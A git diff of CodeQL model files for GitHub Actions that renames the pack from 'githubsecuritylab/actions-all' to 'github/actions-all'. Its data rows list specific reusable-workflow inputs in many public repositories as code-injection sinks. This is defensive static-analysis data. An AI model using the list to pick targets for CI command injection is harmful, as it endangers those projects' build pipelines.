b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 5f85bb1a91ab..109b1fefa7b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 7f1af3242605..87f8bc706b6e 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index b06b390e718f..4c2f4e391b55 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index d5746b566cc6..e3e0a3460d47 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index fbe9e286d2b4..01539c4329ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index 6ba2fc75375d..d26e49d3ef88 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 6d522b776dcd..f5b370e3d593 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index c210f350439a..72659e362711 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 81eeb82033cf..f37d70a718d6 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 6d81f2ff242a..3b4ed4b18b57 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index b7ea7250825c..3dddb9bd3f9e 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 972b6f15baa4..49654eb84b87 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 07f0c5c0f691..f46bcbee1b34 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 6bbf33e7f89a..e3791339c035 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 165965dd568a..f5f6c919cfbe 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 3d1e182458e1..4747cd57c4d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 689cc91871ab..3b68ca76fe2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index 0481c04cb671..62b99c23ff64 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 8c0c944a3937..84347b6cbfaf 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 8f4c44324088..32a3d5061e27 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 9406f7d299cf..d4ffc373678e 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 36838ef4ddb1..5a5d3999ca75 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index 8b16601e6c22..9983ea4eee2a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index e8db2ff568de..e8acf5f2c3cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index 208e444adebc..bd7494ab69a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 41edf0b03737..89b60a4ac845 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index faca7973f1f1..7c72cb57dca6 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index 76db6821c5e6..2e9681cb21eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 383a88ed0556..d30f1bb7bba0 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index bcd3b09ed688..85771a98962a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 53e16f8771a4..194ac90b6482 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index 4310e028de16..d013a9c1b8f2 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 84d2f57a3fbc..57d88f541865 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 7debf6960edc..312d9e193e7c 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index 640180b870af..b62903a97e93 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index 7ea3039b552b..e983a4a6c985 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index ced66aee32f6..4a45392e15d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index e63440d1fcae..ac20cdeeb3d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index f7021148c514..f6876b3bc56c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 8345368057c7..9785efe9637c 100644 
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 3754ebfa63d1..3197652aadc0 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index 3e35747b558a..f0ebfa177242 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index a13f6863caa5..74afc5c0cc54 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index af5c300ea8bd..fa145f6b6257 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index 449ea8b7b490..ab486b47df26 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 6656d42c4e69..dc402bc1e458 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index 6e7fdc34a54b..b5d4d6e4bde0 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 8fc02a27e1cd..83b45112b862 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 80f19676b4a7..c40044c852ee 100644 
